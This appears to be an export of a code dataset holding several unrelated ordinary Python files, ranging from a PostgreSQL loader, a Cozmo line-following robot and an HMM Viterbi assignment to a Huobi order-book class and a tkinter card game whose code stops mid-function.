text stringlengths 8 6.05M |
|---|
# Read a string from the user and report how many characters it contains.
user_text = input('Please enter a string: ')
print('The length of the string is {} characters'.format(len(user_text)))

# Demonstrate tab and newline escape sequences inside a string literal.
demo = 'John said\t"hi"\nI said\t\t"bye"'
print(demo)
import sys
import psycopg2
from helper import connect_database, process_file, table_stats
if __name__ == "__main__":
    # The script expects seven CLI arguments: database name, user, password,
    # host IP, port, table name and the path of the file to load.
    if len(sys.argv) != 8:
        print("Please check your inputs!")
    else:
        db_name, db_user, db_pwd, db_host, db_port, target_table, data_file = sys.argv[1:]
        # Open a cursor/connection pair to PostgreSQL.
        cursor, connection = connect_database(db_name, db_user, db_pwd, db_host, db_port)
        # Bulk-load the file into the target table, then print its stats.
        process_file(cursor, connection, target_table, filepath=data_file)
        print('*****PostgreSQL****')
        table_stats(cursor, target_table)
        print('*******************')
        cursor.close()
        connection.close()
import requests

# Endpoint of the products API (development server on the local network).
url = 'http://192.168.2.133:8000/api/products'
# Fetch the product list as parsed JSON — presumably a list of dicts with
# at least 'price' and 'title' keys (see func1 below); TODO confirm schema.
x = requests.get(url).json()
print(x)
def func1(data):
    """Find the most and least expensive products in *data*.

    data: iterable of dicts with at least 'price' and 'title' keys.
    Prints and returns (max_title, max_price, min_title, min_price).
    Products priced at 0 are ignored for the minimum.
    """
    from math import inf
    max_price_title = None
    min_price_title = None
    min_price = inf
    max_price = 0
    # Bug fix: iterate over the 'data' parameter, not the global 'x'.
    for value in data:
        price = value['price']
        if price > max_price:
            max_price = price
            max_price_title = value['title']
        # Bug fix: independent 'if' (was 'elif'), so a single item can be
        # both the running maximum and the running minimum.
        if 0 < price < min_price:
            min_price = price
            min_price_title = value['title']
    print(max_price_title, max_price, min_price_title, min_price)
    # Return the summary so callers (print(func1(x))) get a value, not None.
    return max_price_title, max_price, min_price_title, min_price
# Print the min/max price summary for the fetched products.
print(func1(x))
# New product to create via the API.
d1 = {
    'title': 'bakyt',
    'image' : 'None',
    'price': 200000000
}
# POST the product as form-encoded data; response kept for inspection.
a = requests.post(url,d1)
import numpy as np
import pandas as pd
def winsorize(data, **kwargs):
    """Keep only rows whose columns fall strictly inside percentile bounds.

    Parameters
    ----------
    data : pd.DataFrame
    **kwargs : column=(lb, ub) pairs of percentile bounds, with ub > lb.

    Returns
    -------
    pd.DataFrame containing only rows where, for every given column,
    lb-percentile < value < ub-percentile. Returns *data* unchanged when
    no bounds are supplied (the original raised on an empty query).

    Raises
    ------
    ValueError : if a bound is not a (lb, ub) tuple with ub > lb.
    """
    clauses = []
    for name, value in kwargs.items():
        # Bug fix: validate with a real exception — assert is stripped
        # under 'python -O'.
        if not (isinstance(value, tuple) and value[1] > value[0]):
            raise ValueError("winsorization lb and ub should be a tuple (lb,ub)")
        lb = np.percentile(data[name], value[0])
        ub = np.percentile(data[name], value[1])
        clauses.append(f"{name}>{lb} and {name}<{ub}")
    if not clauses:
        # No bounds supplied: nothing to filter.
        return data
    # Join clauses instead of trimming a trailing " and" by slicing.
    return data.query(" and ".join(clauses))
|
from selenium import webdriver
import unittest,time
class GetElementTitleByChrome(unittest.TestCase):
    """Check the text of the first 'mnav'-class link on the Baidu home page."""

    def setUp(self):
        self.driver = webdriver.Chrome()
        # Implicit wait: poll up to 10 seconds for elements to appear.
        self.driver.implicitly_wait(10)

    def test_getElementTitle(self):
        self.driver.get("http://www.baidu.com")
        # Locate the first link element whose class attribute is 'mnav'
        # (the "news" link on the Baidu home page).
        element = self.driver.find_element_by_xpath("//*[@class='mnav'][1]")
        # Compare the element's visible text against the expected label.
        self.assertEqual(element.text, "新闻", "不是该文本内容")

    def tearDown(self):
        # Quit the browser session.
        self.driver.quit()
if __name__ == '__main__':
    # Discover and run the test case when executed directly.
    unittest.main()
|
import cozmo
import cv2
import numpy as np
import logging
import asyncio
import sys
import PIL.ImageTk
import tkinter as tk
from threading import Timer
from scipy.interpolate import UnivariateSpline
from cozmo.util import degrees, distance_mm, speed_mmps
# Logger
log = logging.getLogger('ok.FollowLine')

# Global state shared with the camera callback (quick-and-dirty, as the
# original comment admits).
lastSpeedR = 0  # last right wheel speed before the line was lost
lastSpeedL = 0  # last left wheel speed before the line was lost
billigCounter = 0  # watchdog counter: consecutive frames without a line
billigTimeout = 30  # threshold for billigCounter before giving up
# klassen
class Watchdog:
    """One-shot timer that fires a handler unless reset within *timeout*.

    The timer is armed immediately on construction; reset() rearms it,
    stop() cancels it.
    """

    def __init__(self, timeout, userHandler=None):  # timeout in seconds
        self.timeout = timeout
        # Fall back to the built-in handler when none is supplied.
        self.handler = userHandler if userHandler is not None else self.defaultHandler
        self.timer = Timer(self.timeout, self.handler)
        self.timer.start()

    def reset(self):
        # Cancel the pending timer and arm a fresh one.
        self.timer.cancel()
        self.timer = Timer(self.timeout, self.handler)
        self.timer.start()
        log.info('reseted watchdog timer')

    def stop(self):
        self.timer.cancel()

    def defaultHandler(self):
        # Bug fix: the original did 'raise self', which raises a
        # non-exception object and fails with TypeError at runtime.
        raise TimeoutError('watchdog timed out after %s seconds' % self.timeout)
class Main:
    """Cozmo line follower: detects a dark line in the camera image, steers
    the robot along it and mirrors the processed frames into a Tk window."""

    def __init__(self):
        # Set-up logging
        formatter = logging.Formatter('%(asctime)s %(name)s %(levelname)-8s %(message)s')
        handler = logging.StreamHandler()
        handler.setLevel(logging.INFO)
        handler.setFormatter(formatter)
        log.setLevel(logging.INFO)
        log.addHandler(handler)
        # variables
        self.endProgramm = False;
        self._robot = None
        self._tk_root = 0
        self._tk_label_input = 0
        self._tk_label_output = 0
        # Blocks until the Cozmo connection ends; run() is the entry coroutine.
        cozmo.connect(self.run)
        # NOTE(review): set_up_cozmo() already registers this handler; this
        # second registration looks redundant — confirm before removing.
        self._robot.add_event_handler(cozmo.world.EvtNewCameraImage, self.on_img)

    def myHandler(self):
        # Watchdog expiry callback (log-only; shutting down is disabled).
        print("watchdog timer expired")
        #self.endProgramm = True;

    def on_img(self, event, *, image: cozmo.world.CameraImage, **kw):
        """Per-frame handler: find the line and set wheel speeds
        proportionally to its horizontal offset from the image center."""
        raw_img = image.raw_image
        raw_rgb = np.array(raw_img)
        r, g, b = cv2.split(raw_rgb)
        # RGB -> HSV and straight back; the split/merge round trip is
        # effectively a no-op kept from experimentation.
        hsv_img = cv2.cvtColor(np.array(raw_img), cv2.COLOR_RGB2HSV)
        h, s, v = cv2.split(hsv_img)
        mer_img = cv2.merge((h, s, v))
        hsv_img = mer_img
        rgb_img2 = cv2.cvtColor(hsv_img, cv2.COLOR_HSV2RGB)
        rgb_img3 = rgb_img2
        # watchdog timer object
        #watchdog = Watchdog(pathTimeout, self.myHandler())
        try:
            # used global variables (write access needed)
            global billigCounter
            global lastSpeedR
            global lastSpeedL
            #while True:
            # Crop the image into horizontal strips and keep the road band.
            Slices = 10
            crop_img = self.CropImage(rgb_img3, Slices)
            #cv2.imwrite('CropImage.png', crop_img)
            # Convert to grayscale
            gray = cv2.cvtColor(crop_img, cv2.COLOR_BGR2GRAY)
            # Gaussian blur
            blur = cv2.GaussianBlur(gray, (5, 5), 0)
            # Color thresholding (dark line -> white mask via inverse binary).
            ret, thresh1 = cv2.threshold(blur, 60, 255, cv2.THRESH_BINARY_INV)
            #cv2.imwrite('ThresholdImageWithAccidentalDetections.png', thresh1)
            # Erode and dilate to remove accidental line detections
            mask = cv2.erode(thresh1, None, iterations=9)
            mask = cv2.dilate(mask, None, iterations=9)
            # NOTE(review): 3-value unpacking matches OpenCV 3.x only;
            # OpenCV 2.x/4.x findContours returns (contours, hierarchy).
            _, contours, hierarchy = cv2.findContours(mask.copy(), 1, cv2.CHAIN_APPROX_NONE)
            # Find the biggest contour (if detected)
            if len(contours) > 0:
                c = max(contours, key=cv2.contourArea)
                M = cv2.moments(c)
                # Centroid of the largest contour = current line position.
                cx = int(M['m10'] / M['m00'])
                cy = int(M['m01'] / M['m00'])
                cv2.line(crop_img, (cx, 0), (cx, 720), (255, 0, 0), 1)
                cv2.line(crop_img, (0, cy), (1280, cy), (255, 0, 0), 1)
                cv2.drawContours(crop_img, contours, -1, (0, 255, 0), 1)
                maxWindow = 312  # maximum value of cx
                mid = 156  # if the line is exactly centered, then cx == mid
                #sqr = (cx-156)*(cx-165)
                #speedFactor = 0.005*sqr + 2
                # speed in mm/s = mid/speedFactor -> smaller factor, higher speed
                speedFactor = 4.8
                # 5=good 4=possible with curve speed adaptation 3=too fast
                # TODO: nice-to-have: exponential wheel speeds in curves, not linear
                #sqrtestformel = int(((0-0.00005)*((cx-156)*(cx-156))+1)*1000)
                #if int(sqrtestformel) < 0:
                #    sqrtestformel = 0
                #log.info('1Formel: ' + str(sqrtestformel))
                # drive: linear wheel speed, depending on the cx value
                speed = int(mid / speedFactor)
                speed_l = ((cx-mid)/speedFactor)+int(speed)
                speed_r = ((mid-cx)/speedFactor)+int(speed)
                # Remember speeds so we can keep the bend after losing the line.
                lastSpeedL=speed_l
                lastSpeedR=speed_r
                log.info('cx: ' + str(cx) + ' | speed l: ' + str(speed_l) + ' | speed r: ' + str(speed_r))
                self._robot.drive_wheel_motors(int(speed_l), int(speed_r))
                billigCounter = 0
            else:
                log.info('nothing to see here, continuing last known bending')
                log.info('last speed l: ' + str(lastSpeedL) + ' | last speed r: ' + str(lastSpeedR))
                # reduce the turning radius by proportionally braking the inner wheel
                #if lastSpeedR > lastSpeedL:
                #    diff = int(lastSpeedR)-int(lastSpeedL)
                #    self._robot.drive_wheel_motors(int(int(lastSpeedL)-diff), int(lastSpeedR))
                #if lastSpeedR < lastSpeedL:
                #    diff = int(lastSpeedL)-int(lastSpeedR)
                #    self._robot.drive_wheel_motors(int(lastSpeedL), int(int(lastSpeedR)-diff))
                # Count frames without a line; give up after billigTimeout.
                billigCounter = int(billigCounter)+1
                if billigCounter >= billigTimeout:
                    sys.exit(0)
            #millis = int(round(time.time() * 1000))
            #cv2.imwrite(str(millis) + '.png', crop_img)
            # Push the processed frame into the Tk window.
            PilImageForTk = PIL.Image.fromarray(crop_img)
            display_image = PIL.ImageTk.PhotoImage(image=PilImageForTk)
            self._tk_label_input.imgtk = display_image
            self._tk_label_input.configure(image=display_image)
            self._tk_root.update()
        finally:
            # Clean up the connection
            cv2.destroyAllWindows()

    def CropImage(self, inputImage, Slices):
        """Split the frame into *Slices* horizontal strips and return the
        re-joined band used for line detection."""
        images = []
        for i in range(Slices):
            images.append(inputImage)
        height, width = inputImage.shape[:2]
        sl = int(height / Slices)
        for i in range(Slices):
            part = sl * i
            crop_img = inputImage[part:part + sl, 0:width]
            images[i] = crop_img
        # Keep strips 1..5 counted from the bottom (the road directly ahead).
        ImagePart = self.ConnectImages(images, 1, 5)
        return ImagePart

    def ConnectImages(self, images, start, end):
        """Vertically concatenate the strips between *start* and *end*,
        counted from the end of *images*."""
        imgstart = len(images) - 1 - start
        imgend = len(images) - 1 - end
        img = images[imgend]
        #cv2. imwrite('CropImagePart0.png', img)
        for i in range(1, int(end - start + 1)):
            img = np.concatenate((img, images[imgend + i]), axis=0)
            #cv2. imwrite('CropImagePart' + str(i) + '.png', img)
        return img

    def create_LUT_8UC1(self, x, y):
        """Build a 256-entry lookup table by spline-fitting control points."""
        spl = UnivariateSpline(x, y)
        return spl(range(256))

    async def set_up_cozmo(self, coz_conn):
        # TODO: sets Cozmo's parameters (works, but may be useful for looking
        # things up for the "head up" problem, hence the TODO)
        asyncio.set_event_loop(coz_conn._loop)
        self._robot = await coz_conn.wait_for_robot()
        self._robot.camera.image_stream_enabled = True
        self._robot.camera.color_image_enabled = True
        # Look down at the track and raise the lift out of the camera view.
        await self._robot.set_head_angle(cozmo.robot.MIN_HEAD_ANGLE).wait_for_completed()
        self._robot.set_lift_height(1.0).wait_for_completed()
        self._robot.add_event_handler(cozmo.world.EvtNewCameraImage, self.on_img)

    async def run(self, coz_conn):
        """Entry coroutine: configure the robot, build the UI, then idle
        while frame handling happens in on_img."""
        await self.set_up_cozmo(coz_conn)
        self._tk_root = tk.Tk()
        self._tk_label_input = tk.Label(self._tk_root)
        self._tk_label_input.pack()
        while True:
            await asyncio.sleep(0)
if __name__ == '__main__':
    # Constructing Main connects to Cozmo and blocks until disconnect.
    Main()
#!/usr/bin/python3
import sys
import random
from math import log
import numpy as np
from operator import itemgetter
# I used this resource to understand the logic: https://en.wikipedia.org/wiki/Viterbi_algorithm
#####################################################
#####################################################
# Please enter the number of hours you spent on this
# assignment here
num_hours_i_spent_on_this_assignment = 30
#####################################################
#####################################################
#####################################################
#####################################################
# Give one short piece of feedback about the course so far. What
# have you found most interesting? Is there a topic that you had trouble
# understanding? Are there any changes that could improve the value of the
# course to you? (We will anonymize these before reading them.)
# <Your feedback goes here>
#I had to look up online to understand viterbi algorithm properly
#I was not able to attend the last few lectures due to my health and there are no slides on the Viterbi algorithm online
#####################################################
#####################################################
# Outputs a random integer, according to a multinomial
# distribution specified by probs.
def rand_multinomial(probs):
    """Draw an index i at random with probability probs[i]."""
    # Make sure probs sum to 1
    assert(abs(sum(probs) - 1.0) < 1e-5)
    remaining = random.random()
    index = 0
    for prob in probs:
        if remaining < prob:
            return index
        remaining -= prob
        index += 1
    # Floating-point fallthrough: mirror the original's fallback value.
    return 0
# Outputs a random key, according to a (key,prob)
# iterator. For a probability dictionary
# d = {"A": 0.9, "C": 0.1}
# call using rand_multinomial_iter(d.items())
def rand_multinomial_iter(iterator):
    """Draw a key at random from (key, probability) pairs."""
    remaining = random.random()
    for key, prob in iterator:
        if remaining >= prob:
            remaining -= prob
        else:
            return key
    # Mirror the original's fallback value for floating-point edge cases.
    return 0
class HMM():
    """Two-state hidden Markov model over DNA characters (A, C, T, G)."""

    def __init__(self):
        self.num_states = 2
        self.prior = [0.5, 0.5]
        self.transition = [[0.999, 0.001], [0.01, 0.99]]
        self.emission = [{"A": 0.291, "T": 0.291, "C": 0.209, "G": 0.209},
                         {"A": 0.169, "T": 0.169, "C": 0.331, "G": 0.331}]

    # Generates a sequence of states and characters from
    # the HMM model.
    # - length: Length of output sequence
    def sample(self, length):
        sequence = []
        states = []
        # (Removed an unused random.random() call that only perturbed the
        # seeded RNG stream.)
        cur_state = rand_multinomial(self.prior)
        for i in range(length):
            states.append(cur_state)
            char = rand_multinomial_iter(self.emission[cur_state].items())
            sequence.append(char)
            cur_state = rand_multinomial(self.transition[cur_state])
        return sequence, states

    # Generates a emission sequence given a sequence of states
    def generate_sequence(self, states):
        return [rand_multinomial_iter(self.emission[state].items())
                for state in states]

    def logprob(self, sequence, states):
        """Natural-log probability of *sequence* given *states*.

        Uses log(ab) = log(a) + log(b): prior of the first state, then one
        transition + emission term per subsequent position.
        """
        if not states:
            # Preserve the original behaviour for an empty state sequence.
            return 0
        # Bug fix: the original used self.prior[index] (i.e. always
        # prior[0]) instead of the prior of the first *state*. The default
        # symmetric prior [0.5, 0.5] masked the bug.
        prob = log(self.prior[states[0]]) + log(self.emission[states[0]][sequence[0]])
        for index in range(1, len(states)):
            val = states[index]
            prob += log(self.transition[states[index - 1]][val])
            prob += log(self.emission[val][sequence[index]])
        return prob

    # Outputs the most likely sequence of states given an emission sequence
    # - sequence: String with characters [A,C,T,G]
    # return: list of state indices, e.g. [0,0,0,1,1,0,0,...]
    def viterbi(self, sequence):
        states = [0, 1]  # the two known states
        # Dynamic-programming table: one dict per position mapping each
        # state to its best log probability and backpointer.
        table = [{}]
        for s in states:
            table[0][s] = {"probability": log(self.prior[s]) + log(self.emission[s][sequence[0]]),
                           "prevState": 0}
        for index in range(1, len(sequence)):
            table.append({})
            for st in states:
                # Best predecessor for state st at this position (ties break
                # toward state 0, matching the original's first-match scan).
                best_prev = max(states,
                                key=lambda s1: table[index - 1][s1]["probability"]
                                + log(self.transition[s1][st]))
                best_prob = (table[index - 1][best_prev]["probability"]
                             + log(self.transition[best_prev][st])
                             + log(self.emission[st][sequence[index]]))
                table[index][st] = {"probability": best_prob, "prevState": best_prev}
        # Backtrack from the best final state.
        # Bug fixes: the original (a) left its backtracking start state at 0
        # because the assignment after 'break' was unreachable, and (b)
        # returned the path back-to-front without reversing it.
        last_state = max(states, key=lambda s: table[-1][s]["probability"])
        path = [last_state]
        for t in range(len(table) - 2, -1, -1):
            last_state = table[t + 1][last_state]["prevState"]
            path.append(last_state)
        path.reverse()
        return path
def read_sequence(filename):
    """Return the file's contents with surrounding whitespace stripped."""
    with open(filename, "r") as handle:
        return handle.read().strip()
def write_sequence(filename, sequence):
    """Write the characters of *sequence* to *filename* as a single string."""
    with open(filename, "w") as handle:
        handle.write("".join(sequence))
def write_output(filename, logprob, states):
    """Write the log probability, the count of each state (0 and 1) and the
    concatenated state string, one item per line."""
    lines = [str(logprob)]
    lines.extend(str(states.count(state)) for state in range(2))
    lines.append("".join(map(str, states)))
    with open(filename, "w") as handle:
        handle.write("\n".join(lines) + "\n")
# Decode the sequence file named by the first CLI argument and write the
# Viterbi states plus their log probability next to it.
hmm = HMM()
# NOTE: 'file' shadows the builtin; kept as-is for compatibility.
file = sys.argv[1]
sequence = read_sequence(file)
viterbi = hmm.viterbi(sequence)
logprob = hmm.logprob(sequence, viterbi)
# Output name strips a 4-character extension — assumes e.g. '.txt'; TODO confirm.
name = "my_"+file[:-4]+'_output.txt'
write_output(name, logprob, viterbi)
|
#!/usr/bin/python
import random
import sys
def main():
    # NOTE: this script is Python 2 (print statements).
    # TODO don't remove!
    # Seed the RNG from the first CLI argument for reproducible tests.
    seed = int(sys.argv[1])
    random.seed(seed)
    # TODO test generation
    t = int(sys.argv[2])  # number of test cases
    n = int(sys.argv[3])  # elements per test case
    print t
    for _ in range(t):
        print n
        # n random values in [1, 10^9] on one line (trailing comma: no newline).
        for i in range(n):
            print random.randint(1, 10**9),
        print
        # Random tree: node i+1 is attached to a random earlier node.
        for i in range(1, n):
            print i + 1, 1 + random.randint(0, i - 1)

main()
|
#!/usr/bin/env python
from decimal import Decimal
from aiokafka import ConsumerRecord
import bz2
import logging
from sqlalchemy.engine import RowProxy
from typing import (
Any,
Optional,
Dict
)
import ujson
from hummingbot.logger import HummingbotLogger
from hummingbot.core.event.events import TradeType
from hummingbot.core.data_type.order_book cimport OrderBook
from hummingbot.core.data_type.order_book_message import OrderBookMessage, OrderBookMessageType
from hummingbot.connector.exchange.huobi.huobi_utils import convert_from_exchange_trading_pair
_hob_logger = None
cdef class HuobiOrderBook(OrderBook):
    """Order-book message factory for Huobi: converts raw exchange,
    database and Kafka payloads into OrderBookMessage objects."""

    @classmethod
    def logger(cls) -> HummingbotLogger:
        # Lazily create and cache the module-level logger singleton.
        global _hob_logger
        if _hob_logger is None:
            _hob_logger = logging.getLogger(__name__)
        return _hob_logger

    @classmethod
    def snapshot_message_from_exchange(cls,
                                       msg: Dict[str, Any],
                                       timestamp: Optional[float] = None,
                                       metadata: Optional[Dict] = None) -> OrderBookMessage:
        """Build a SNAPSHOT message from a raw exchange snapshot payload."""
        if metadata:
            msg.update(metadata)
        # "ts" is in milliseconds; convert to whole seconds.
        msg_ts = int(msg["ts"] * 1e-3)
        content = {
            "trading_pair": convert_from_exchange_trading_pair(msg["trading_pair"]),
            "update_id": msg_ts,
            "bids": msg["tick"]["bids"],
            "asks": msg["tick"]["asks"]
        }
        return OrderBookMessage(OrderBookMessageType.SNAPSHOT, content, timestamp or msg_ts)

    @classmethod
    def trade_message_from_exchange(cls,
                                    msg: Dict[str, Any],
                                    timestamp: Optional[float] = None,
                                    metadata: Optional[Dict] = None) -> OrderBookMessage:
        """Build a trade message from a raw exchange trade payload."""
        if metadata:
            msg.update(metadata)
        msg_ts = int(msg["ts"] * 1e-3)
        content = {
            "trading_pair": convert_from_exchange_trading_pair(msg["trading_pair"]),
            # NOTE(review): "buy" is mapped to TradeType.SELL (and vice
            # versa) — presumably msg["direction"] is the opposite side of
            # the recorded trade; confirm the intended inversion.
            "trade_type": float(TradeType.SELL.value) if msg["direction"] == "buy" else float(TradeType.BUY.value),
            "trade_id": msg["id"],
            "update_id": msg_ts,
            "amount": msg["amount"],
            "price": msg["price"]
        }
        # NOTE(review): message type is DIFF although this carries trade
        # content — looks like it should be TRADE; confirm before changing.
        return OrderBookMessage(OrderBookMessageType.DIFF, content, timestamp or msg_ts)

    @classmethod
    def diff_message_from_exchange(cls,
                                   msg: Dict[str, Any],
                                   timestamp: Optional[float] = None,
                                   metadata: Optional[Dict] = None) -> OrderBookMessage:
        """Build a DIFF message from a raw exchange depth-update payload."""
        if metadata:
            msg.update(metadata)
        msg_ts = int(msg["ts"] * 1e-3)
        content = {
            # Channel looks like "market.<pair>.depth...": field 1 is the pair.
            "trading_pair": convert_from_exchange_trading_pair(msg["ch"].split(".")[1]),
            "update_id": msg_ts,
            "bids": msg["tick"]["bids"],
            "asks": msg["tick"]["asks"]
        }
        return OrderBookMessage(OrderBookMessageType.DIFF, content, timestamp or msg_ts)

    @classmethod
    def snapshot_message_from_db(cls, record: RowProxy, metadata: Optional[Dict] = None) -> OrderBookMessage:
        """Build a SNAPSHOT message from a database row."""
        ts = record["timestamp"]
        # The json column may already be decoded depending on the driver.
        msg = record["json"] if type(record["json"])==dict else ujson.loads(record["json"])
        if metadata:
            msg.update(metadata)
        return OrderBookMessage(OrderBookMessageType.SNAPSHOT, {
            "trading_pair": convert_from_exchange_trading_pair(msg["ch"].split(".")[1]),
            "update_id": int(ts),
            "bids": msg["tick"]["bids"],
            "asks": msg["tick"]["asks"]
        }, timestamp=ts * 1e-3)

    @classmethod
    def diff_message_from_db(cls, record: RowProxy, metadata: Optional[Dict] = None) -> OrderBookMessage:
        """Build a DIFF message from a database row."""
        ts = record["timestamp"]
        msg = record["json"] if type(record["json"])==dict else ujson.loads(record["json"])
        if metadata:
            msg.update(metadata)
        return OrderBookMessage(OrderBookMessageType.DIFF, {
            # DB diff rows use the compact schema: s / b / a keys.
            "trading_pair": convert_from_exchange_trading_pair(msg["s"]),
            "update_id": int(ts),
            "bids": msg["b"],
            "asks": msg["a"]
        }, timestamp=ts * 1e-3)

    @classmethod
    def snapshot_message_from_kafka(cls, record: ConsumerRecord, metadata: Optional[Dict] = None) -> OrderBookMessage:
        """Build a SNAPSHOT message from a Kafka consumer record."""
        ts = record.timestamp
        msg = ujson.loads(record.value.decode())
        if metadata:
            msg.update(metadata)
        return OrderBookMessage(OrderBookMessageType.SNAPSHOT, {
            "trading_pair": convert_from_exchange_trading_pair(msg["ch"].split(".")[1]),
            "update_id": ts,
            "bids": msg["tick"]["bids"],
            "asks": msg["tick"]["asks"]
        }, timestamp=ts * 1e-3)

    @classmethod
    def diff_message_from_kafka(cls, record: ConsumerRecord, metadata: Optional[Dict] = None) -> OrderBookMessage:
        """Build a DIFF message from a bz2-compressed Kafka record."""
        decompressed = bz2.decompress(record.value)
        msg = ujson.loads(decompressed)
        ts = record.timestamp
        if metadata:
            msg.update(metadata)
        return OrderBookMessage(OrderBookMessageType.DIFF, {
            "trading_pair": convert_from_exchange_trading_pair(msg["s"]),
            "update_id": ts,
            "bids": msg["bids"],
            "asks": msg["asks"]
        }, timestamp=ts * 1e-3)

    @classmethod
    def trade_message_from_db(cls, record: RowProxy, metadata: Optional[Dict] = None):
        """Build a TRADE message from a database row."""
        msg = record["json"]
        ts = record.timestamp
        # First trade entry in the tick payload.
        data = msg["tick"]["data"][0]
        if metadata:
            msg.update(metadata)
        return OrderBookMessage(OrderBookMessageType.TRADE, {
            "trading_pair": convert_from_exchange_trading_pair(msg["ch"].split(".")[1]),
            # NOTE(review): "sell" maps to BUY here (inverse of the raw
            # direction) — confirm intended semantics.
            "trade_type": float(TradeType.BUY.value) if data["direction"] == "sell" else float(TradeType.SELL.value),
            "trade_id": ts,
            "update_id": ts,
            "price": data["price"],
            "amount": data["amount"]
        }, timestamp=ts * 1e-3)

    @classmethod
    def from_snapshot(cls, msg: OrderBookMessage) -> "OrderBook":
        """Construct a new order book pre-populated from a snapshot message."""
        retval = HuobiOrderBook()
        retval.apply_snapshot(msg.bids, msg.asks, msg.update_id)
        return retval
|
from tkinter import *
from model.nethandler.battle_net_client import BattleNetClient
from model.nethandler.battle_net_server import BattleNetServer
from views.image_factory import ImageFactory
class GameFrame(Frame):
    """Main battle ("bataille") card-game view: card sheet, deck, discard
    pile, player names, per-player messages and scores, all driven by the
    callbacks of the network battle handler."""

    def __init__(self, master):
        Frame.__init__(self, master, bg='darkblue')
        # self.master.wm_attributes('-transparentcolor', 'lime')
        self.nb_players = 2
        # Interaction flags, toggled by the battle callbacks bound in init().
        self.can_draw = True
        self.can_pick_mine = False
        self.can_pick_all = False
        self.on_par = False
        self.in_battle = False
        self.game_ended = False
        # Cards drawn by each player in the current battle round.
        self.battle_stage = [0, 0, 0, 0]
        self.players = []
        # Pixel positions of the four card columns and the three label rows.
        self._coords_x = [150, 390, 520, 650]
        self._coords_y = [75, 100, 285]
        self._sheet = Canvas(self, bg="darkblue", border=3, highlightbackground='lightblue')
        self._sheet.place(relx=0.025, rely=0.05, anchor=NW, bordermode=INSIDE, relwidth=0.95, relheight=0.65)
        # ===== DECK =====
        self._deck = Label(self, bg="darkblue")
        self._deck.image = ImageFactory.instance.get_deck()
        self._deck.config(image=self._deck.image)
        self._deck.place(relx=0.25, rely=1, anchor=S)
        # ===== DISCARD PILE ("défausse") =====
        self._defausse = Label(self, bg="darkblue")
        self._defausse.place(relx=0.65, rely=1, anchor=CENTER)
        # ===== PLAYERS NAMES =====
        self._players_names = []
        for i in range(4):
            self._players_names.append(Label(self, fg="white", bg="darkblue"))
            self._players_names[i].place(x=self._coords_x[i], y=self._coords_y[0], anchor=NW)
        # ===== CARDS ===== (4 columns x 3 rows; each label remembers its card)
        self._cards = []
        for i in range(12):
            self._cards.append(Label(self, bg="darkblue", borderwidth=0))
            self._cards[i].place(x=self._coords_x[i % 4], y=self._coords_y[1] + int(i / 4) * 20, anchor=NW)
            self._cards[i].bind('<ButtonRelease-1>', self.card_picked)
            self._cards[i].bind('<B1-Motion>', self.drag_card)
            self._cards[i].card = None
        # ===== MESSAGES =====
        self._messages = []
        for i in range(4):
            self._messages.append(Label(self, fg="gold", bg="darkblue"))
            self._messages[i].place(x=self._coords_x[i], y=self._coords_y[2], anchor=NW)
        # ===== SCORES =====
        self._scores = []
        for i in range(4):
            self._scores.append(Label(self, fg="gold", bg="darkblue"))
            self._scores[i].place(y=i * 25, relx=0.975, rely=0.75, anchor=NE)
        # ===== TOP CARD =====
        self._top_card = Label(self, bg="darkblue", borderwidth=0)
        self._top_card.image = ImageFactory.instance.get_back()
        self._top_card.config(image=self._top_card.image)
        self._top_card.place(relx=0.25, rely=1, anchor=CENTER)
        self._top_card.bind('<ButtonRelease-1>', self.card_drawed)
        self._top_card.bind('<B1-Motion>', self.drag_card)

    def init(self):
        """(Re)start a game: collect player names and rebind the battle
        handler's callbacks onto this view."""
        self.players.clear()
        # ===== COLLECT PLAYER NAMES WHEN ACTING AS A SERVER =====
        if isinstance(self.master.handler, BattleNetServer):
            self.players.append(self.master.handler.name)
            for agent in self.master.handler.players:
                self.players.append(agent.agent_name)
        # ===== COLLECT PLAYER NAMES WHEN ACTING AS A CLIENT =====
        elif isinstance(self.master.handler, BattleNetClient):
            self.players.append(self.master.handler.name)
            self.players.extend(self.master.handler.players_names)
        # ===== REBIND THE BATTLE CALLBACKS =====
        def on_new_turn():
            print('== New turn!')
            self.new_turn()
            self.refresh_scores()
        def on_card_drawn(player_name, card):
            # player_name is falsy when the local player drew the card.
            if player_name:
                print(player_name + ' drawed ' + str(card))
                index_player = self.players.index(player_name)
            else:
                print('I drawed ' + str(card))
                index_player = 0
            # Card slot: player column + one row per battle stage.
            index = index_player + self.battle_stage[index_player] * 4
            self.battle_stage[index_player] += 1
            # During a battle the second-row card may stay face down.
            if (not self.master.handler.no_card_upside_down) and (int(index / 4) == 1):
                image = ImageFactory.instance.get_back()
            else:
                image = ImageFactory.instance.get(card)
            self.update_card_img(index, image)
            self._cards[index].card = card
        def on_battle(in_battle, other_members_names):
            print('== Battle!')
            if in_battle:
                self.can_draw = True
                self.in_battle = True
                self.replace_top_card()
                self.battle_stage[0] = 1
                self._messages[0]['text'] = "BATAILLE !"
            # NOTE(review): indentation reconstructed — confirm this loop
            # should run even when the local player is not in the battle.
            for i in range(1, self.nb_players):
                if self.players[i] in other_members_names:
                    self.battle_stage[i] = 1
                    self._messages[i]['text'] = "BATAILLE !"
        def on_turn_finished(winner_name):
            # winner_name is falsy when the local player won the turn.
            if winner_name:
                print('== ' + winner_name + ' wins this turn!')
                index = self.players.index(winner_name)
            else:
                print('== I win this turn!')
                index = 0
            self.can_pick_all = True
            self.can_draw = False
            self.in_battle = False
            self.battle_stage = [0, 0, 0, 0]
            for label in self._messages:
                label['text'] = ''
            self._messages[index]['text'] = "GAGNÉ !"
            self.hide_top_card()
        def on_turn_par():
            # The turn ended in a tie ("égalité").
            print("== Turn par!")
            self.on_par = True
            self.can_pick_mine = True
            self.in_battle = False
            self.battle_stage = [0, 0, 0, 0]
            self._messages[0]['text'] = "ÉGALITÉ"
            self.hide_top_card()
        def on_player_picked_card(card):
            # Hide the matching card label once another player takes it.
            for i in range(12):
                label_card = self._cards[i]
                if label_card.card and label_card.card == card:
                    label_card.image = None
                    label_card.lower()
                    break
        def on_game_ended():
            print("== No more card for me")
            self.game_ended = True
            self._top_card.place_forget()
            self._deck.place_forget()
        def on_game_won(winner_name):
            print('== ' + winner_name + ' WINS THE GAME!')
            self.master.winners.append(winner_name)
            self.master.raise_frame('scores')
        def on_game_par(winners_names):
            winners = ''
            for name in winners_names:
                winners += name + " "
            print('== ' + winners + 'WIN THE GAME!')
            self.master.winners = winners_names
            self.master.raise_frame('scores')
        self.master.battle.on_new_turn = on_new_turn
        self.master.battle.on_card_drawn = on_card_drawn
